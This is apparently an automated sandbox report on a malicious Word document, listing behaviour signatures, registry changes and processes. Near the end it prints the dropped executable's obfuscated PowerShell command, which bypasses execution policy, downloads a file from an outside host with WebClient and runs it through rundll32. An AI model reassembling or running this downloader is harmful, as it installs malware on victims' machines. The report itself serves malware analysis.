Analysis Overview
SHA256
54257271a5f00afb180199a38c277e9257e907407ae6d7b9e0e5e425d8fd37e0
Threat Level: Likely malicious
The file 5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Office macro that triggers on suspicious action
Suspicious Office macro
Executes dropped EXE
Loads dropped DLL
Drops file in Windows directory
Enumerates physical storage devices
Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Modifies registry class
Checks processor information in registry
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-20 04:19
Signatures
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious Office macro
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-20 04:19
Reported
2024-05-20 04:22
Platform
win7-20240220-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Enumerates physical storage devices
Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc"
C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe
C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe $oaibfxvjiowlxxw_iekfpfyiuuoycid='org/CJ';$natpxmhofkbbeb_huseueei='ojqa';$owaizbpyuaoyyawtzcwqygabpqsrqeeidno4=' =';$eikoia_yblegbmybniemxea_ogwepz='e]$ojqa0';$mdroaenb_esuwo='ient).';$wvmbvwoxkjuhjt='($env:a';$mzoiuddeyajlqncmnrvpotqghzbopauau='($';$tcozygiwfcyinfvnu_euqaocnlecylzi='br';$qcyeatbinwxsmezc_hmhviayrcnolalvknuiefhjf='+ ''';$aoauapzujgioje_xidu_aaibeabsc87='.php';$okeygvmueodiuuyuz='Net';$yitmzuozoufzu_lficf_gdhpoeuqao2='$env:t';$sgagyyoabqaaaioi='k;}}Se';$cfruonrvvuhve_ixrbnpdclveyouklainlriu=' $path=';$aooajmeeiyupyyusaqxznw='Downl';$yamzywruogbpvbyuunmq97=' -Sc';$mwyzyn_vhaa_gzewtucmxgu='a+''\';$udm_ug_rphwvtreioe_jtneafrollnf_xjuwpzz='ea';$gvsudskwuyopb_kekkatmqpdqasgaegjhsvki=''',$pat';$vbsif_aeknkgtcrajatpyktombewksswo='t-';$mmwsme_kyvxu_edvejwrrwdtvuseduio_lnwi_es='%s';$ua_wybbegalseqrkkigmuueik='rmat ';$bxauxi_gdiqlvelokehc=');(Ne';$iu_ebbubieeuynqayu_rcpfykziuepqojd02='.Webcl';$ubgieohxfasnveuauyunvnyyafalf_tuf='ct S';$rlhio_vzhdxeytzwdajcaio='lcn';$c_qwtnvmm_mwitcyidseg=') -';$uymddyuwrfj_truyyqv=' = $';$ieaetbrqnosgobb='xeofiu''';$ulhqbioxuairmxscoeywdo='\g';$iiqjwpysluziyi='h); rund';$fm_lzloaflyqunl_rrvjpmd=' Ge';$kayrdaavkijoqmiiieadeowqbw='oad';$s_bvcqmepdogzwmoqwr_uscmigyassarl='; $qgyx';$uso_dl_vwzkeeskgpp_ibvewjmr='uCokZbLZ';$atke_aahgy_awuhinj_yarqjoiagbdomxcm='Ex';$ytr_ulakmoxieyuuqsa='ope P';$wmqaligua_xjensemze='le(';$uziux_cxljaau='olic';$qdkp_tslelwso_iuwnaby_np='11;whi';$upfihhmu_bruiaypxwc_nzfkbtrgtx_yujyep_jxyuu5='ate -UFo';$oauwfabx_dhpjo_iodh_ulpunmfktuavteai=' ''f1'';Re';$wtoxtvoiougt_y='re';$byadiryyayieeidgqqmjrgeactagkrpexhu='emp ';$bqgddecgsiiajzoourpmbdeayguxj='cur';$sq_aqnpeltdkhy_idwjrpgmqq_ufzty='et-Da';$ijfkefmziiwkqqxy='shops.';$ydndgjo_eeopr_fdjdezhomjqqeyeeyeyu_qb='File(''';$idrypqufftaiazps='yste';$egxtowvvxgkzyeykhonizpgwa_rjoeuanpo=' $path ,';$fsyy_cy_ydewla_a_yeifzavusld_e='ll32';$txjyexcuyf_moyzdaaylgqru='ecutionP';$aef_noyxiax_puskee='ad = G';$brraekqxipsc_u='m 4';$acgyap_iqwholxtyekmd_xoayczaumoao='0 + 11.';$tmi_hibeeyaxhueiswapcwr='y Bypass';$e_utyoesneikpukijvwxeamahf_ii='t-D';$gdzgogct_uzouwzezekvialzuqoi='ase.dll''';$uy_aywtlioixpgipyixqufajvjnfk_a='et';$kzfwuwzbhtztiihor_rhaiscfboclhe='77;if';$qpb_elgvzsl_iqmfch='lcnad -g';$kgeyoiapuoiutzvlkft_f_bnbmioasyv='eep -';$uiieeutyymuyscizu62='){';$cnyjzkyeff_uobpdkcas='t-Sl';$ei_oefjuuyalgvsyjxnewacxtxr='tem (';$iivobpybzsthaoopoisugotiiiieduhhr08='rmat';$jptjeey_kzmhoaosrugpervewfwzsvvs='[doubl';$xknnmepjaanpebhypu='ppdat';$igeoekzbisdoztezqosdyeuokg='1){ $';$vxzopznvaorxujcbx='te -UFo';$p_lmbqvpyzegfzwimu='w-Obje';$pstxzidydhkykpkknua='m.';$ieenx_au_yycve_svmhohfeaxessifksygx='se -forc';$alfwlkamnera=' %s;Star';$ao_mbuayqujiyyapwsniiue='move-I';$wcfdjjedlijj0='//groovy';$somgplgrotbymcrajk_y='e;';$yagwueilv_uavozttcstoizd_vlvgm_ia_uvjhahrp='rocess;';$lzbwawc_sfiygjoyuucrzy_aii='http:';$auijlrquyuonww_xotmtfapkxbzyaoeea64='e $qgyx'; Invoke-Expression 